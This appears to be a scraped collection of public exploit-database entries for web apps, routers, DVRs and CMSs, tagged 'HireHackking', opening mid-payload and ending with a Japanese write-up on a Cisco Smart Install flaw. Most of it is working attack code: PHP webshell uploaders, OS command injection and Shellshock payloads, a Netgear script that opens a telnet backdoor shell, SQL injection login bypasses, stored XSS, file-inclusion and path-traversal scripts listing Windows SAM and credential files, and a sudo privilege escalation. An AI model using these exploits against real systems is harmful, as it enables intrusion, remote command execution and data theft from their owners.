= [];\n                    for (var key in params) {\n                        if (params.hasOwnProperty(key)) {\n                            a.push(encodeURIComponent(key) + \"=\" + encodeURIComponent(params[key]));\n                        }\n                    }\n                    return a.join(\"&\");\n                }\n                var xhr = new XMLHttpRequest();\n                xhr.open(\"POST\", url, true);\n                xhr.setRequestHeader(\"Content-Type\", \"application/x-www-form-urlencoded\");\n                xhr.onreadystatechange = function() {\n                    if (xhr.readyState === 4 && xhr.status === 200) {\n                        try {\n                            var responseJson = JSON.parse(xhr.responseText);\n                            callback(responseJson);\n                        } catch (error) {\n                            alert(\"Error while parsing response: \" + error);\n                        }\n                    }\n                };\n                xhr.send(getQueryString());\n            }\n\n            document.onclick = function(event) {\n                event = event || window.event;\n                var selection = window.getSelection();\n                var target = event.target || event.srcElement;\n\n                if (target.tagName === \"SELECT\") {\n                    return;\n                }\n\n                if (!selection.toString()) {\n                    eShellCmdInput.focus();\n                }\n            };\n\n            window.onload = function() {\n                eShellCmdInput = document.getElementById(\"shell-cmd\");\n                eShellContent = document.getElementById(\"shell-content\");\n                updateCwd();\n                eShellCmdInput.focus();\n            };\n        </script>\n    </head>\n\n    <body>\n        <div id=\"shell\">\n            <pre id=\"shell-content\">\n                <div id=\"shell-logo\">\n        ___                         ____      _          _ _        _  _   <span></span>\n _ __  / _ \\__      ___ __  _   _  / __ \\ ___| |__   ___| | |_ /\\/|| || |_ <span></span>\n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_  ..  _|<span></span>\n| |_) | |_| |\\ V  V /| | | | |_| | | (_| \\__ \\ | | |  __/ | |_   |_      _|<span></span>\n| .__/ \\___/  \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_)    |_||_|  <span></span>\n|_|                         |___/  \\____/                                  <span></span>\n                </div>\n            </pre>\n            <div id=\"shell-input\">\n                <label for=\"shell-cmd\" id=\"shell-prompt\" class=\"shell-prompt\">???</label>\n                <div>\n                    <input id=\"shell-cmd\" name=\"cmd\" onkeydown=\"_onShellCmdKeyDown(event)\"/>\n                </div>\n            </div>\n        </div>\n    </body>\n\n</html>\n\r\n-----------------------------17366980624047956771255332862--\r\n"


session.post(exploit_url, headers=header, data=body)
print('[+] Exploit done !')
print(' -> Webshell uploaded to: http://' + target_ip + ':' + target_port + wp_path + 'wp-content/uploads/backup-guard/shell.php')
print('')
HireHackking 
# Exploit Title: TextPattern CMS 4.9.0-dev - Remote Command Execution (RCE) (Authenticated)
# Date: 07/04/2021
# Exploit Author: Mevlüt Akçam
# Software Link: https://github.com/textpattern/textpattern
# Vendor Homepage: https://textpattern.com/
# Version: 4.9.0-dev
# Tested on: 20.04.1-Ubuntu

#!/usr/bin/python3


import requests
from bs4 import BeautifulSoup as bs4
import json
import string
import random
import argparse


# Colors
RED="\033[91m"
GREEN="\033[92m"
RESET="\033[0m"

parser = argparse.ArgumentParser()
parser.add_argument('-t', '--url', required=True, action='store', help='Target url')
parser.add_argument('-u', '--user', required=True, action='store', help='Username')
parser.add_argument('-p', '--password', required=True, action='store', help='Password')
args = parser.parse_args()

URL=args.url
uname=args.user
passwd=args.password

session=requests.Session()

def login(uname,passwd):
    data={'lang':'en','p_userid':uname,'p_password':passwd}
    r_login=session.post(URL+"/textpattern/index.php",data=data, verify=False)

    if r_login.status_code == 200:
        print(GREEN,f"[+] Login successful , your cookie : {session.cookies['txp_login']}",RESET)
    else:
        print(RED,f"[-] Login failed",RESET)
        exit()

def get_token():
    print(GREEN,f"[+] Getting token ",RESET)
    r_token=session.get(URL+"/textpattern/index.php?event=plugin")
    soup = bs4(r_token.text, 'html.parser')
    textpattern = soup.find_all("script")[2].string.replace("var textpattern = ", "")[:-1]
    textpattern = json.loads(textpattern)
    return textpattern['_txp_token']

def upload():
    file_name=''.join(random.choice(string.ascii_lowercase) for _ in range(10))
    file={
        'theplugin':(
            file_name+".php",
            """
            <html>
            <body>
            <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
            <input type="TEXT" name="cmd" autofocus>
            <input type="SUBMIT" value="Execute">
            </form>
            <pre>
            <?php if(isset($_GET['cmd'])){system($_GET['cmd']);} ?>
            </pre>
            </body>
            </html>
            <!-- """+file_name+" -->"
        ),# The file_name is used to verify that the file has been uploaded.
        'install_new':(None,'Upload'),
        'event':(None,'plugin'),
        'step':(None,'plugin_upload'),
        '_txp_token':(None,get_token()),
    }

    r_upload=session.post(URL+"/textpattern/index.php",verify=False,files=file)

    if file_name in r_upload.text:
        print(GREEN,f"[+] Shell uploaded",RESET)
        print(GREEN,f"[+] Webshell url : {URL}/textpattern/tmp/{file_name}.php",RESET)
    else:
        print(RED,f"[-] Shell failed to load",RESET)
        print(RED,f"[-] Bye",RESET)
        exit()


if __name__=="__main__":
    login(uname,passwd)
    upload()
    print(GREEN,f"[+] Bye",RESET)
HireHackking 
# Exploit Title: Simple Client Management System 1.0 - Remote Code Execution (RCE)
# Date: July 4, 2021
# Exploit Author: Ishan Saha
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/client-details.zip
# Version: 1.0
# Tested on: Windows 10 Home 64 Bit + Wampserver Version 3.2.3 & Ubuntu & Kali

#!/usr/bin/python

# Description:

# 1. This uses the SQL injection to bypass the admin login and create a new user
# 2. The new user makes a client with the shell payload and uploads the generic shellcode into the server
# 3. the shell is called from the location 

import requests 
from colorama import Fore, Back, Style
'''
Description:
Using the sql injeciton to bypass the login and create a user. 
This user creates a client with the shell as an image and uploads the shell.
The shell is called by the requests library for easier use.
------------------------------------------
Developed by - Ishan Saha & HackerCTF team  (https://twitter.com/hackerctf)
------------------------------------------
'''
# Variables : change the URL according to need
URL="http://192.168.0.248/client/"
shellcode = "<?php system($_GET['cmd']);?>"
filename = "shell.php"
authdata={"username":"admin' or '1'='1","password":"admin' or '1'='1","login":"Submit Query"}
createuser = {"fname":"ishan","lname":"saha","email":"research@hackerctf.com","password":"Grow_with_hackerctf","contact":"1234567890","signup":"Sign Up"}
userlogin={"uemail":"research@hackerctf.com","password":"Grow_with_hackerctf","login":"LOG IN"}
shelldata={"fname":"a","lname":"l","uname":"l","email":"l@l.l","phone":"1234567890","plan":"k","pprice":"k","proofno":"l","caddress":"ll","haddress":"ll","rdate":"9/9/09","bdate":"9/9/09","depatment":"l","csubmit":"Submit"}
def format_text(title,item):
  cr = '\r\n'
  section_break=cr + '*'*(len(str(item))+len(title)+ 3) + cr 
  item=str(item)
  text= Fore.YELLOW +section_break + Style.BRIGHT+ Fore.RED + title + Fore.RESET +" : "+  Fore.BLUE + item + Fore.YELLOW + section_break + Fore.RESET
  return text


ShellSession = requests.Session()
response = ShellSession.get(URL)
response = ShellSession.post(URL + "admin/index.php",data=authdata)
response = ShellSession.post(URL + "admin/regester.php",data=createuser)
response = ShellSession.post(URL,data=userlogin)
response = ShellSession.post(URL + "create.php",data=shelldata,files={"uimg":(filename,shellcode,"application/php"),"proof1":(filename,shellcode,"application/php"),"proof2":(filename,shellcode,"application/php")})
location = URL +"img/" + filename
#print statements
print(format_text("Target",URL),end='')
print(format_text("Shell Upload","success" if response.status_code ==200 else "fail"),end='')
print(format_text("shell location",location),end='')
print(format_text("Initiating Shell","[*]Note- This is a custom shell, upgrade to NC!"))

while True:
    cmd = input(Style.BRIGHT+ Fore.RED+"SHELL>>> "+ Fore.RESET)
    if cmd == 'exit':
        break
    print(ShellSession.get(location + "?cmd="+cmd).content.decode())
HireHackking 
# Exploit Title: Ricon Industrial Cellular Router S9922XL - Remote Command Execution (RCE) 
# Date: 02.07.2021
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.riconmobile.com


#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
#
# Ricon Industrial Cellular Router S9922XL Remote Command Execution
#
#
# Vendor: Ricon Mobile Inc.
# Product web page: https://www.riconmobile.com
# Affected version: Model: S9922XL and S9922L
#                   Firmware: 16.10.3
#
# Summary: S9922L series LTE router is designed and manufactured by
# Ricon Mobile Inc., it based on 3G/LTE cellular network technology
# with industrial class quality. With its embedded cellular module,
# it widely used in multiple case like ATM connection, remote office
# security connection, data collection, etc.
#
# The S9922XL-LTE is a mobile network router based on 4G/4.5G, WiFi
# and VPN technologies. Powerful 64-bit Processor and integrated real-time
# operating system specially developed by Ricon Mobile. S9922XL is
# widely used in many areas such as intelligent transportation, scada,
# POS, industrial automation, telemetry, finance, environmental protection.
#
# Desc: The router suffers from an authenticated OS command injection
# vulnerability. This can be exploited to inject and execute arbitrary
# shell commands as the admin (root) user via the 'ping_server_ip' POST
# parameter. Also vulnerable to Heartbleed.
#
# --------------------------------------------------------------------
# C:\>python ricon.py 192.168.1.71 id
# uid=0(admin) gid=0(admin)
# --------------------------------------------------------------------
#
# Tested on: GNU/Linux 2.6.36 (mips)
#            WEB-ROUTER
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2021-5653
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5653.php
#
#
# 02.07.2021
#

import requests,sys,re

if len(sys.argv)<3:
    print("Ricon Industrial Routers RCE")
    print("Usage: ./ricon.py [ip] [cmd]")
    sys.exit(17)
else:
    ipaddr=sys.argv[1]
    execmd=sys.argv[2]

data={'submit_class'  :'admin',
      'submit_button' :'netTest',
      'submit_type'   :'',
      'action'        :'Apply',
      'change_action' :'',
      'is_ping'       :'0',
      'ping_server_ip':';'+execmd}

htreq=requests.post('http://'+ipaddr+'/apply.cgi',data=data,auth=('admin','admin'))
htreq=requests.get('http://'+ipaddr+'/asp/admin/netTest.asp',auth=('admin','admin'))
reout=re.search("20\">(.*)</textarea>",htreq.text,flags=re.S).group(1).strip('\n')
print(reout)
HireHackking 
# Exploit Title: Netgear DGN2200v1 - Remote Command Execution (RCE) (Unauthenticated)
# Date: 02.07.2021
# Exploit Author: SivertPL
# Vendor Homepage: https://www.netgear.com/
# Version: All prior to v1.0.0.60

#!/usr/bin/python

"""
NETGEAR DGN2200v1 Unauthenticated Remote Command Execution

Author: SivertPL (kroppoloe@protonmail.ch)
Date: 02.07.2021
Status: Patched in some models
Version: All prior to v1.0.0.60
Impact: Critical 

CVE: No CVE number assigned
PSV: PSV-2020-0363, PSV-2020-0364, PSV-2020-0365


References: 
    1) https://www.microsoft.com/security/blog/2021/06/30/microsoft-finds-new-netgear-firmware-vulnerabilities-that-could-lead-to-identity-theft-and-full-system-compromise/
    2) https://kb.netgear.com/000062646/Security-Advisory-for-Multiple-HTTPd-Authentication-Vulnerabilities-on-DGN2200v1


The exploit script only works on UNIX-based systems.

This ancient vulnerability works on other models utilizing Bezeq firmware, so not just DGN2200v1 is vulnerable. It is estimated that around 7-10 other models might be or might have been vulnerable in the past.
This is a very old exploit, dating back to 2017, so forgive me for Python2.7 lol.

"""

import sys
import requests
import os

target_ip = "192.168.0.1"
telnet_port = 666
sent = False

def main():
    if len(sys.argv) < 3:
        print "./dgn2200_pwn.py <router ip> <backdoor-port>"
        exit()

    target_ip = sys.argv[1]
    telnet_port = int(sys.argv[2])
    print "[+] Sending the payload to " + target_ip + " and opening the backdoor ..."
    send_payload()
    print "[+] Trying to connect to the backdoor for " + str(telnet_port) + " ..."
    print "[!] If it fails to connect it means the target is probably not vulnerable"
    spawn_shell()

def send_payload():
    try:
        requests.get("http://" + target_ip + "/dnslookup.cgi?host_name=www.google.com; /usr/sbin/telnetd -p " + str(telnet_port) + " -l /bin/sh" + str(telnet_port) + "&lookup=Lookup&ess_=true")
        sent = True
    except Exception:
        sent = False
        print "[-] Unknown error, target might not be vulnerable."

def spawn_shell():
    if sent:
        print "[+] Dropping a shell..."
        os.system("telnet " + target_ip + " " + telnet_port)
    else:
        exit()


if __name__ == "__main__":
    main()
HireHackking 
# Exploit Title: Visual Tools DVR VX16 4.2.28.0 - OS Command Injection (Unauthenticated)
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.
# CVE: CVE-2021-42071
# Reference: https://www.swascan.com/security-advisory-visual-tools-dvr-cve-2021-42071/

# An unauthenticated remote attacker can inject arbitrary commands to CGI script that can result in remote command execution.

curl -H 'User-Agent: () { :; }; echo ; echo ; /bin/cat /etc/passwd' bash -s :'' http:/DVR_ADDR/cgi-bin/slogin/login.py
HireHackking 
# Exploit Title: perfexcrm 1.10 - 'State' Stored Cross-site scripting (XSS)
# Date: 05/07/2021
# Exploit Author: Alhasan Abbas (exploit.msf)
# Vendor Homepage: https://www.perfexcrm.com/
# Version: 1.10
# Tested on: windows 10

Vunlerable page: /clients/profile

POC:
----
POST /clients/profile HTTP/1.1

Host: localhost

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------325278703021926100783634528058

Content-Length: 1548

Origin: http://localhost

Connection: close

Referer: http://localhost/clients/profile

Cookie: sp_session=07c611b7b8d391d144a06b39fe55fb91b744a038

Upgrade-Insecure-Requests: 1



-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="profile"



1

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="profile_image"; filename=""

Content-Type: application/octet-stream





-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="firstname"



adfgsg

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="lastname"



fsdgfdg

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="company"



test

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="vat"



1

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="phonenumber"





-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="country"



105

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="city"



asdf

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="address"



asdf

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="zip"



313

-----------------------------325278703021926100783634528058

Content-Disposition: form-data; name="state"



""><body onload=alert("XSS")>">

-----------------------------325278703021926100783634528058--

then any one open profile page in user the xss its executed
HireHackking 
# Exploit Title: Black Box Kvm Extender 3.4.31307 - Local File Inclusion
# Date: 05.07.2021
# Exploit Author: Ferhat Çil
# Vendor Homepage: http://www.blackbox.com/
# Software Link: https://www.blackbox.com/en-us/products/black-box-brand-products/kvm
# Version: 3.4.31307
# Category: Webapps
# Tested on: Linux
# Description: Any user can read files from the server
# without authentication due to an existing LFI in the following path:
# http://target//cgi-bin/show?page=FilePath

import requests
import sys

if name == 'main':
    if len(sys.argv) == 3:
        url = sys.argv[1]
        payload = url + "/cgi-bin/show?page=../../../../../../" + sys.argv[2]
        r = requests.get(payload)
        print(r.text)
    else:
        print("Usage: " + sys.argv[0] + ' http://example.com/ /etc/passwd')
HireHackking 
# Exploit Title: Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)
# Date: 06/07/2021
# Exploit Author: Thamer Almohammadi (@Thamerz88)
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14205/exam-hall-management-system-full-source-code-using-phpmysql.html
# Version: 1.0
# Tested on: Kali Linux

# Proof of Concept :

1- Send Request to /pages/save_user.php.
2- Find your shell.php file path and try any command.


################################## REQUEST ###############################
POST /pages/save_user.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877
Content-Length: 369
-----------------------------3767690350396265302394702877
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: application/x-php
<?php

system($_GET['cmd']);

?>
-----------------------------3767690350396265302394702877

Content-Disposition: form-data; name="btn_save"

-----------------------------3767690350396265302394702877--




################################## RESPONSE #############################
HTTP/1.1 200 OK
Date: Tue, 06 Jul 2021 02:16:18 GMT
Server: Apache/2.4.47 (Unix) OpenSSL/1.1.1k PHP/7.3.28 mod_perl/2.0.11 Perl/v5.32.1
X-Powered-By: PHP/7.3.28
Content-Length: 1529
Connection: close
Content-Type: text/html; charset=UTF-8



################################## Exploit #############################
<?php
// Coder By Thamer Almohammadi(@Thamerz88);
function exploit($scheme,$host,$path,$shell){
    $url=$scheme."://".$host.$path;
    $content='<form enctype="multipart/form-data" method="POST"><input type="hidden" name="MAX_FILE_SIZE" value="512000" />File To Upload : <input name="userfile" type="file" /><input type="submit" value="Upload"/></form><?php $uploaddir = getcwd ()."/";$uploadfile = $uploaddir . basename ($_FILES[\'userfile\'][\'name\']);if (move_uploaded_file ($_FILES[\'userfile\'][\'tmp_name\'], $uploadfile)){echo "File was successfully uploaded.</br>";}else{echo "Upload failed";}?>';
    $data    = "-----------------------------3767690350396265302394702877\r\n";
    $data   .= "Content-Disposition: form-data; name=\"image\"; filename=\"$shell\"\r\n";
    $data   .= "Content-Type: image/gif\r\n\r\n";
    $data   .= "$content\r\n";
    $data   .= "-----------------------------3767690350396265302394702877\r\n";

    $data    .= "-----------------------------3767690350396265302394702877\r\n";
    $data   .= "Content-Disposition: form-data; name=\"btn_save\"\r\n\r\n";
    $data   .= "\r\n";
    $data   .= "-----------------------------3767690350396265302394702877\r\n";

    $packet = "POST $path/pages/save_user.php HTTP/1.0\r\n";
    $packet .= "Host: $host\r\n";
    $packet .= "User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:29.0) Gecko/20100101 Firefox/29.0\r\n";
    $packet .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*\/*;q=0.8\r\n";
    $packet .= "Accept-Language: en-us,en;q=0.5\r\n";
    $packet .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------3767690350396265302394702877\r\n";
    $packet .= "Content-Length: ".strlen ($data)."\r\n\r\n\r\n";
    $packet .= $data;
    $packet .= "\r\n";
    send($host, $packet);
    sleep(2);
    check($url,$shell);
}
function send($host, $packet)
{
        if ($connect = @fsockopen ($host, 80, $x, $y, 3))
        {
                @fputs ($connect, $packet);
                @fclose ($connect);
        }

}

function check($url,$shell){
    $check=file_get_contents($url."/uploadImage/Profile/".$shell);
    $preg=preg_match('/(File To Upload)/', $check, $output);
    if($output[0] == "File To Upload"){
        echo "[+] Upload shell successfully.. :D\n"; 
        echo "[+] Link ". $url."/uploadImage/Profile/".$shell."\n"; 
        }
    else{ //Exploit Failed
        echo "[-] Exploit Failed..\n"; 
    }


}
$options=getopt("u:s:");
if(!isset($options['u'], $options['s'])) 
die("\n [+] Simple Exploiter Exam Hall Management System by T3ster \n [+] Usage : php exploit.php -u http://target.com -s shell.php\n 
-u http://target.com   = Target URL ..
-s shell.php           = Shell Name ..\n\n");  
$url=$options["u"];
$shell=$options["s"];
$parse=parse_url($url);
$host=$parse['host'];
$path=$parse['path'];
$scheme=$parse['scheme'];
exploit($scheme,$host,$path,$shell);

?>
HireHackking 
# Exploit Title: Billing System Project 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Date: 06.07.2021
# Exploit Author: Talha DEMİRSOY
# Software Link: https://www.sourcecodester.com/php/14831/billing-system-project-php-source-code-free-download.html
# Version: V 1.0
# Tested on: Linux & Windows

import requests
import random
import string
from bs4 import BeautifulSoup

let = string.ascii_lowercase
shellname = ''.join(random.choice(let) for i in range(15))
randstr = ''.join(random.choice(let) for i in range(15))

payload= "<?php if(isset($_GET['cmd'])){ echo '<pre>'; $cmd =
($_GET['cmd']); system($cmd); echo '</pre>'; die; } ?>"

url = input("Target : ")

session = requests.session()

reqUrl = url + "login.php"
reqHead = {"Content-Type": "application/x-www-form-urlencoded"}
reqData = {"username": "admin' or '1'='1'#", "password": "-", "login": ''}
session.post(reqUrl, headers=reqHead, data=reqData)

print("Shell Uploading...")

reqUrl = url + "php_action/createProduct.php"
reqHead = {"Content-Type": "multipart/form-data;
boundary=----WebKitFormBoundaryOGdnGszwuETwo6WB"}
reqData =
"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"currnt_date\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data; name=\"productImage\";
filename=\""+shellname+".php\"\r\nContent-Type:
application/octet-stream\r\n\r\n"+payload+"\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"productName\"\r\n\r\n"+randstr+"_TalhaDemirsoy\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"quantity\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"rate\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"brandName\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"categoryName\"\r\n\r\n2\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"productStatus\"\r\n\r\n1\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB\r\nContent-Disposition:
form-data;
name=\"create\"\r\n\r\n\r\n------WebKitFormBoundaryOGdnGszwuETwo6WB--\r\n"
session.post(reqUrl, headers=reqHead, data=reqData)

print("product name is "+randstr)
print("shell name is "+shellname)

reqUrl = url + "product.php"
data = session.get(reqUrl)

parser = BeautifulSoup(data.text, 'html.parser')
find_shell = parser.find_all('img')

for i in find_shell:
    if shellname in i.get("src"):
        print("Shell URL : " + url  + i.get("src") + "?cmd=whoami")
HireHackking 
# Exploit Title: Pallets Werkzeug 0.15.4 - Path Traversal
# Date: 06 July 2021
# Original Author: Emre ÖVÜNÇ
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://palletsprojects.com/
# Software Link: https://github.com/pallets/werkzeug
# Version: Prior to 0.15.5
# Tested on: Windows Server
# CVE: 2019-14322
# Credit: Emre Övünç and Olivier Dony for responsibly reporting the issue
# CVE Link: https://nvd.nist.gov/vuln/detail/CVE-2019-14322
# Reference : https://palletsprojects.com/blog/werkzeug-0-15-5-released/

Description : Prior to 0.15.5, it was possible for a third party to potentially access arbitrary files when the application used SharedDataMiddleware on Windows. Due to the way Python's os.path.join() function works on Windows, a path segment with a drive name will change the drive of the final path. TLDR; In Pallets Werkzeug before 0.15.5, SharedDataMiddleware mishandles drive names (such as C:) in Windows pathnames lead to arbitrary file download.

#!/usr/bin/env python3
# PoC code by @faisalfs10x [https://github.com/faisalfs10x]

""" $ pip3 install colorama==0.3.3, argparse, requests, urllib3
    $ python3 CVE-2019-14322.py -l list_target.txt"
"""
import argparse
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
import requests
from colorama import Fore, Back, Style, init

# Colors
red = '\033[91m'
green = '\033[92m'
white = '\033[97m'
yellow = '\033[93m'
bold = '\033[1m'
end = '\033[0m'

init(autoreset=True)

def banner_motd():
    print(Fore.CYAN +Style.BRIGHT +"""                                                                

        CVE-2019-14322 %sPoC by faisalfs10x%s - (%s-%s)%s %s 
""" % (bold, red, white, yellow, white, end))

banner_motd()

# list of sensitive files to grab in windows

# %windir%\repair\sam
# %windir%\System32\config\RegBack\SAM
# %windir%\repair\system
# %windir%\repair\software
# %windir%\repair\security
# %windir%\debug\NetSetup.log (AD domain name, DC name, internal IP, DA account)
# %windir%\iis6.log (5,6 or 7)
# %windir%\system32\logfiles\httperr\httperr1.log
# C:\sysprep.inf
# C:\sysprep\sysprep.inf
# C:\sysprep\sysprep.xml
# %windir%\Panther\Unattended.xml
# C:\inetpub\wwwroot\Web.config
# %windir%\system32\config\AppEvent.Evt (Application log)
# %windir%\system32\config\SecEvent.Evt (Security log)
# %windir%\system32\config\default.sav
# %windir%\system32\config\security.sav
# %windir%\system32\config\software.sav
# %windir%\system32\config\system.sav
# %windir%\system32\inetsrv\config\applicationHost.config
# %windir%\system32\inetsrv\config\schema\ASPNET_schema.xml
# %windir%\System32\drivers\etc\hosts (dns entries)
# %windir%\System32\drivers\etc\networks (network settings)
# %windir%\system32\config\SAM
# TLDR:
# C:/windows/system32/inetsrv/config/schema/ASPNET_schema.xml
# C:/windows/system32/inetsrv/config/applicationHost.config
# C:/windows/system32/logfiles/httperr/httperr1.log 
# C:/windows/debug/NetSetup.log - (may contain AD domain name, DC name, internal IP, DA account)
# C:/windows/system32/drivers/etc/hosts - (dns entries)
# C:/windows/system32/drivers/etc/networks - (network settings)

def check(url):

	# There are 3 endpoints to be tested by default, but to avoid noisy, just pick one :)
	for endpoint in [
			'https://{}/base_import/static/c:/windows/win.ini', 
			#'https://{}/web/static/c:/windows/win.ini', 
			#'https://{}/base/static/c:/windows/win.ini'
			]:
		try:

			url2 = endpoint.format(url)
			resp = requests.get(url2, verify=False, timeout=5)
			
			if 'fonts' and 'files' and 'extensions' in resp.text:
				print(Fore.LIGHTGREEN_EX +Style.BRIGHT +" [+] " +url2+ " : vulnerable====[+]")
				with open('CVE-2019-14322_result.txt', 'a+') as output:
					output.write('{}\n'.format(url2))
					output.close()

			else:
				print(" [-] " +url+ " : not vulnerable")

		except KeyboardInterrupt:
			exit('User aborted!')
		except:
			print(" [-] " +url+ " : not vulnerable")


def main(args):

    f = open(listfile, "r")
    for w in f:
        url = w.strip()
            
        check(url)
    
if __name__ == '__main__':

    try:

        parser = argparse.ArgumentParser(description='CVE-2019-14322')
        parser.add_argument("-l","--targetlist",required=True, help = "target list in file")
        args = parser.parse_args()
        listfile = args.targetlist

        main(args)

    except KeyboardInterrupt:
        exit('User aborted!')
HireHackking 
# Exploit Title: Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)
# Date: 2021-07-06
# Exploit Author: faisalfs10x (https://github.com/faisalfs10x)
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10, XAMPP


###########
# PoC     #
###########

Request:
========

POST /osms/Execute/ExLogin.php HTTP/1.1
Host: localhost
Content-Length: 43
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/osms/index.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Username=or+1%3D1%2F*&Password=or+1%3D1%2F*


Payload:
=========

Username=or 1=1/*
Password=or 1=1/*
HireHackking 
# Exploit Title: Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation
# Date: 2021-07-05
# Exploit Author: Andrea D'Ubaldo
# Vendor Homepage: https://visual-tools.com/
# Version: Visual Tools VX16 v4.2.28.0
# Tested on: VX16 Embedded Linux 2.6.35.4.

#An attacker can perform a system-level (root) local privilege escalation abusing unsafe Sudo configuration.

sudo mount -o bind /bin/sh /bin/mount
sudo mount
HireHackking

0x01はじめに

スマートインストールクライアントコードでは、スタックベースのバッファオーバーフローの脆弱性が見つかりました。攻撃者は、ログインを認証せずに任意のコードをリモートで実行できます。 Cisco Smartインストールは、新しいスイッチの簡単な展開を提供する「プラグアンドプレイ」構成および画像管理機能です。この機能により、ユーザーはCiscoスイッチをどこにでも配置し、ネットワークにインストールし、追加の構成要件なしで起動することができます。したがって、脆弱なネットワークデバイスを完全に制御できます。スマートインストールは、新しいスイッチに適したグラフィカルインターフェイス管理を提供するプラグアンドプレイの構成と画像管理機能です。初期構成プロセスを自動化し、オペレーティングシステムの現在ロードされている画像を介して新しいスイッチを提供します。この機能は、構成が変更されたときにホットプラグとホットプラグのリアルタイムバックアップも提供します。この機能は、デフォルトでクライアントで有効になっていることに注意してください。

0x02脆弱性の説明

Cisco iOSおよびiOS-XEシステムのSmartインストールクライアントコード(CVE-2018-0171)には、バッファスタックオーバーフローの脆弱性が存在します。攻撃者は、悪意のあるデータパケットをTCP 4786ポートにリモートで送信し、脆弱性を活用してターゲットデバイスのスタックオーバーフローの脆弱性をトリガーし、デバイスがサービスを拒否したり、リモートコマンドの実行を引き起こしたりし、攻撃者は脆弱性に影響を与えるネットワークデバイスをリモートで制御できます。 Cisco Switchであると報告されています

TCP 4786ポートはデフォルトで開いています

0x03脆弱性をチェック

1。シスコネットワークデバイスにTCP 4786ポートが開いている場合、攻撃に対して脆弱です。このようなデバイスを見つけるには、NMAPを介してターゲットネットワークをスキャンするだけです。

NMAP -P T:4786 192.168.1.0/24

2。ネットワークデバイスでスマートインストールクライアントの機能が有効になっているかどうかを確認するために、次の例は、スマートインストールクライアントとして構成されたCisco Catalyst Switchのshow vstack configコマンドの出力です。

switch1#show vstack config

chole: client(smartinstall exabled)

switch2#show vstack config

capability:クライアント

Opera Mode:有効になっています

役割:クライアント

